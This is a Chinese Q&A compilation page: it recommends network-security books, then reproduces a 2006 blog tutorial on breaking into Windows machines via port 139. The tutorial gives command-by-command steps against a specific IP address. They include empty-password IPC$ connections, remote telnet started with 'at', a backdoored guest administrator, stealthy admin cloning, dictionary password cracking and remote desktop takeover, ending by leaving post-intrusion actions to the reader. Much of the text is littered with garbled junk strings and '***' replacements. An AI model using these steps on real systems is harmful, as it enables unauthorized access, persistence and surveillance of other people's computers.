本文目录一览:
- 1、给推荐几个适合初学者的 *** 安全网站或者书籍
- 2、网站渗透入侵全部教程
- 3、《网站入侵与脚本-攻防修炼》这本书怎么样?
- 4、谁能提供关于 *** 信息安全的书,本人是初学者,以后想从事相关的工作,想买些相关的书自学
- 5、侵入网站该看什么书
给推荐几个适合初学者的 *** 安全网站或者书籍
书 名: *** 安全教程 作 者:田园 出版社: 人民邮电出版社 出版时间: 2009 ISBN: 9787115204370 开本: 16 定价: 28.00 元《 *** 安全教程》主要介绍 *** 安全的理论基础和应用技术,全书内容分四个部分:第Ⅰ部分主要阐述 *** 入侵的典型手段及反入侵技术,包括对入侵检测和防火墙技术的深入讨论;第Ⅱ部分主要阐述分布式系统中的安全策略和访问控制技术,详细讨论了几类典型的安全策略的实现 *** ;第Ⅲ部分主要介绍计算机密码技术及典型的 *** 安全协议,详细讨论了典型的身份认证协议、基于口令的密钥交换协议、一般类型的密钥交换协议和组群密钥交换协议,还包括与此相关的应用;第Ⅳ部分介绍当代 *** 安全领域中的一些更高级的内容,包括安全协议的分析与验证技术、承诺协议、零知识证明协议和多方保密计算协议的典型应用。 《 *** 安全教程》内容新颖、深入浅出、实例丰富,所有的介绍都紧密联系具体的应用。除传统内容外,《 *** 安全教程》还包括相当一部分其他教科书很少讨论的重要内容,如适合于无线传感器 *** 的密钥发布协议、基于口令的密钥交换协议、组群安全协议和多方保密计算协议等。传统安全技术的透彻阐述,新一代安全技术的精辟导引,内容紧密联系实际。《 *** 安全教程》阐述 *** 安全的基础理论和应用技术,学习《 *** 安全教程》只需要读者具备离散数学、计算机 *** 及软件技术的基础知识。虽然《 *** 安全教程》面向初学者,但最终目标是带领读者达到一个较高的程度,不仅掌握一定程度的理论知识,而且对当前 *** 安全领域所解决的一些典型问题及解决这类问题的典型 *** 有一个较深入的理解。为此,作者在内容的选择上不追求面面俱到:在理论基础方面,选材和阐述的原则是“够用”。在技术性内容方面,原则是“典型”和“有发展潜力”。 网站:
网站渗透入侵全部教程
新手先学法律知识,知道哪些行为不能做再学渗透技术。
学习基本的技术术语,了解基本的黑客技术。链接:正式学习课程,可以观看小风教程网的免费课程。链接:新手可以看完小风教程网的基础课程,自己学会搭建一个靶场,再通过学会的技术去自己入侵自己搭建的网站,这样既不会违法也能实战学习到技术。因为网站漏洞是复杂的,不同的网站有不同的漏洞,对于新手来说应该把所有常见漏洞都学会,才能系统入门渗透。
《网站入侵与脚本-攻防修炼》这本书怎么样?
菜鸟的话就看黑客渗透笔记 大概40左右。
冰的原点写的,这个适合你
谁能提供关于 *** 信息安全的书,本人是初学者,以后想从事相关的工作,想买些相关的书自学
实战 *** 安全——实战 *** 技术丛书 ¥30.40元
本书阐述了 *** 所涉及的安全问题,还通过实例、实训来增强读者的理解及动手能力。主要内容包括 *** 安全基础知识、物理与环境安全、操作系统安全、 *** 通信安全、Web安全、数据安全、病毒及其预防、黑客攻击与防范、防火墙技术及有关 *** 安全的法律法规。本书不仅?...
*** 安全CISCO解决方案 ¥33.25元
虽然Cisco Systems公司通过推出Cisco Secure产品系列来帮助客户建立安全的 *** ,但到目前为止,国内尚没有使用cisco Secure产品系列来解决因特网安全性问题的出版物,本书的出版填补了这一空白。本书英文原版的作者都是具有高深资深的 *** 安全专家,其中主笔人Andrew ...
Microsoft,UNIX及Oracle主机和 *** 安全 ¥75.05元
本书凝聚了数十位权威的国际安全专家的实战经验和技术总结。它不仅提供了Windows系统、UNIX系统和Oracle系统的主机及 *** 安全解决方案,而且包括了企业的安全管理规范和原则;它既高屋建瓴地描述了企业内部网整体面临的安全威胁和漏洞,又细致地介绍了Windows,UNIX ...
黑客大曝光: *** 安全机密与解决方案(第3版,1CD) ¥75.05元
本书从攻击者和防御者的不同角度系统地阐述了计算机和 *** 入侵手段以及相应的防御措施。学习本书中,可以研磨著名安全专家Stuart McClure,Joel Scambary和George Kurtz提供的最新的最为详细的渗透和攻击实例,并向他们学习如何一步步地保护系统。此外,书中还增添?...
MICROSOFF,UNIX及ORACLE主机和 *** 安全 ¥75.05元
本书凝聚了数十位权威的国际安全专家的实战经验和技术总结。它不仅提供了Windows系统、UNIX系统和Oracle系统的主机及 *** 安全解决方案,而且包括了企业的安全管理规范和原则;它既高屋建瓴地描述了企业内部网整体面临的安全威胁和漏洞,又细致地介绍了Windows,UNIX,O ...
*** 安全概论——安全技术大系 ¥39.90元
本书全面系统地介绍了 *** 安全的概念、原理及体系架构,详细论述了密码技术、公钥基础设施(PKI)、特权管理基础设施(PMI)、 *** 层安全性问题,以及Web、电子邮件、数据库安全和操作系统的安全性问题,并对最新的防火墙技术、 *** 攻击技术和黑客入侵检测技术、计算机?...
*** 安全实用教程 (第二版) ¥42.75元
本书介绍的知识可以保护您的数字化知识、数据和功能不被误用和篡改。本书详细介绍了防火墙实现 *** 、无线 *** 、桌面保护系统、生物识别技术和大量最新的核心安全措施。理解攻击的4种方式以及每一种攻击方式对机构造成的损害,有助于保护信息和系统的基本安全服务。通过?...
*** 安全——公众世界中秘密通信 ¥42.75元
本书全面阐述了信息安全理论,全书共分五个部分,即密码学、认证、标准、电子邮件以及其他安全机制。其中,之一部分阐述了密码算法的基本原理以及各种经典的和现代的加密算法。第二部分介绍了如何在 *** 中证明身份、人在向设备证明自己的身份时可能碰到的问题、认证握手 ...
计算机 *** 安全 ¥17.10元
随着计算机 *** 技术的广泛应用和飞速发展,计算机信息 *** 已成为现代信息社会的基础设施。它作为进行信息交流、开展各种社会活动的基础工具,已深入到人们工作和生活当中。同时,计算机安全问题也随之日益突出,计算机病毒扩散、 *** 黑客攻击、计算机 *** 犯罪等违法事件 ...
移动 *** 安全技术与应用 ¥30.40元
本书从实际应用角度出发,先从整体上对移动 *** 、移动 *** 面临的安全威胁、移动 *** 相对于有线 *** 的特点等做了简要介绍,并给读者提供了必要的基础知识,然后从移动安全技术、移动安全攻与防、部署移动安全、移动安全应用四个方面对移动 *** 安全做了细致的描述和讨论。 ...
密码学与 *** 安全(影印版) ¥45.60元
本书清晰易懂地介绍了密码学和 *** 安全的基本概念和实际问题,探讨了加密、解密、对称和不对称密钥,详细分析和解释了各种主要密码算法,包括数据加密标准(DES),国际数据加密算法(IDEA),RC5,Blowfish,先进加密标准(AES),RSA,数字签名算法(DSA)等,并讨论了主要用?...
*** 安全——公众世界中的秘密通信(第二版) ¥42.75元
本书全面阐述了信息安全理论,全书共分五个部分,即密码学、认证、标准、电子邮件以及其他安全机制。其中,之一部分阐述了密码算法的基本原理以及各种经典的和现代的加密算法。第二部分介绍了如何在 *** 中证明身份、人在向设备证明自己的身份时可能碰到的问题、认证握?...
计算机 *** 安全 ¥27.55元
本书以 *** 安全通常采取的安全措施(对策)为主线,系统地介绍了 *** 安全知识和技术,重点介绍了 *** 系统的安全运行和 *** 信息的安全保护,内容包括操作系统安全、数据库与数据安全、 *** 实体安全、数据加密与鉴别、防火墙安全、 *** 病毒防治、入侵检测与防护、黑客攻击及 ...
计算机 *** 安全 ¥27.55元
...
黑客大曝光: *** 安全机密与解决方案(第5版) ¥74.10元
因特网是一个脆弱的生态系统,没有什么人能够确保赢得胜利。作为一家全球性的信息安全技术公司的总裁,我曾经亲眼目睹Nimda、Blaster和Fun Love等蠕虫像纳粹德国发动的闪电战那样洗劫了无数的公司。在这类攻击活动刚爆发时的关键而又混乱的几个小时里,全世界的信息安全 ...
密码学与 *** 安全 ¥40.85元
Atul Kahate在印度和世界IT业中已经有8年的工作经验,他取得了统计学学士学位和计算机系统专业的MBA学位。这是他撰写的第二部IT专著,他过去曾为Tata McGraw-Hill出版公司与他人合写了“Web Technologies -TCP/IP to Internet Application Architectures”一书。目前,?...
*** 安全实用教程(第二版) ¥42.75元
本书介绍的知识可以保护您的数字化知识、数据和功能不被误用和篡改。本书详细介绍了防火墙实现 *** 、无线 *** 、桌面保护系统、生物识别技术和大量最新的核心安全措施。理解攻击的4种方式以及每一种攻击方式对机构造成的损害,有助于保护信息和系统的基本安全服务通过指?...
*** 安全实用技术标准教程 ¥23.75元
本书详细阐述了计算机 *** 安全的相关机制,整体安全机制分为防御、攻击、 *** 安全管理和整体安全体系几个部分。第1部分从常见的防御机制出发,从 *** 安全产品入手介绍了防火墙、入侵侦测系统,同时从 *** 层次体系的角度出发,详细描述了 *** 层的协议、面临的攻击和相应?...
*** 安全设计标准教程 ¥23.75元
本书详细叙述利用Windows Server 2003构建安全 *** 的基础知识。内容主要分为两部分:之一部分介绍 *** 安全和操作系统的基本概念,包括 *** 安全概论、 *** 攻击的目的、 *** 和原理以及操作系统概论和Windows Server 2003的简要介绍;第二部分详细介绍有关Windows Server 2 ...
*** 安全——技术与实践 ¥46.55元
全书共分3篇15章。第1篇为 *** 安全基础篇,共3章,主要讨论了 *** 安全的基础知识,并从 *** 协议安全性的角度出发,阐述了当今计算机 *** 中存在的安全威胁;第2篇为保密学基础,共5章,较详细地讨论了 *** 安全中涉及的各种密码技术;第3篇为 *** 安全实践,共7章,主要介?...
*** 安全与电子商务 ¥19.95元
本书从 *** 安全的概念和基本知识入手,介绍了 *** 及通信安全、黑客及其防范、病毒及其防治、防火墙和加密技术、数字签名与身份认证、操作系统与数据安全、安全电子交易协议和 *** 安全管理等内容。在编写体例方面, *** 安全在前,电子商务安全在后, *** 安全威胁在前,防 ...
Cisco *** 安全 ¥28.31元
实用的、权威的Cisco *** 安全指南。本书是关于Cisco *** 安全中关键要素的实现和配置的最实用、最方便的指南!资深 *** 安全顾问James Pike为Cisco安全产品的实现和配置提供了循序渐进的指南——包括使用PIX防火墙的深入介绍。 ...
计算机 *** 安全与管理 ¥31.35元
本书针对计算机学科的特点,主要介绍加密算法在该领域的基本实现和应用。书中不过多讲述原理,而是在综合介绍各种 *** 攻击和防范技术的基础上,进一步强调如何用动态的手段来解决动态发展的 *** 安全问题。所应用的管理手段包括对设备、技术、人员、业务等各个方面的 ...
计算机 *** 安全技术(第二版) ¥24.70元
本书是对之一版内容进行更新后形成的第二版。 本书详细介绍了计算机 *** 安全技术的基础理论、原理及其实现 *** 。内容包括计算机 *** 安全技术概论、计算机 *** 安全基础、实体安全与硬件防护技术、密码技术与压缩技术、数据库系统安全、 *** 存储备份技术、计算机 ...
家用电脑 *** 安全防护与隐私保护掌中宝 ¥9.50元
全书分为 *** 安全基础篇、 *** 防护实战篇和个人隐私保护篇。从家用电脑使用过程中经常碰到的各类问题着手,针对与 *** 安全相关的病毒、黑客、木马、邮件炸弹、个人隐私等内容进行详细介绍,并提出了各种相关的防范措施。
侵入网站该看什么书
黑客新手教程--入侵
2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴
我的日志
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:之一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
5e@pf9~)I0 之一部份:知识介绍爱好者博墅M t8pM+bnX,_
(1)什么是端口
i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
0qn$jxW8R'h0 (2)端口是唯一的吗?
d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]
(3)TCP139端口的作用
\+g6k@"]0 TCP139是用于 *** 共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用
st q'l(@SrC0b0 首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
P @7i~]4W0 点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件,输入c:\dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
C['_^}9U A^0 cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\d: 就到了D盘下了,而不用cd d:,这点要注意。爱好者博墅/@Kb/HL;t ?5Q
del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
;}D |0uU3w0 copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx
net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
s C+Ay5? Y.}y0 net use
'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于之一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?爱好者博墅/^)o!e]L6{2z
net view爱好者博墅/v-o?MN'I.H
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q
net share
*Y,\ IP"h.?;I8l~ H0net share 用于开放共享,输入net share *** =c:\tencent,你会发现多了一个名为 *** 的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja
net user爱好者博墅"q"R7p Qy"EO
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X
┎———————————————————————————————————————————————————————┒
6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。 ┃
4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E
┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR
┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚
3\|;h aU,]0net start / net stop
iC!ok n0net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。爱好者博墅"`k,H5au'S;O;U
*at 命令,net time
"g|?\f;VJ0之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus
*** BCrack 针对特定主机,暴力猜解密码爱好者博墅 ^,f]cRs+n
DameWare Mini Remote Control 监控运程屏幕
~f9b fy#i"o0 CA.exe 克隆管理员账号
第二部份:入侵实例
,Kz/K ?#Hbw/k0今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。爱好者博墅"W e!Y8De
文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用 *** BCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入 *** bcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A
(2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?
(3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M
好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。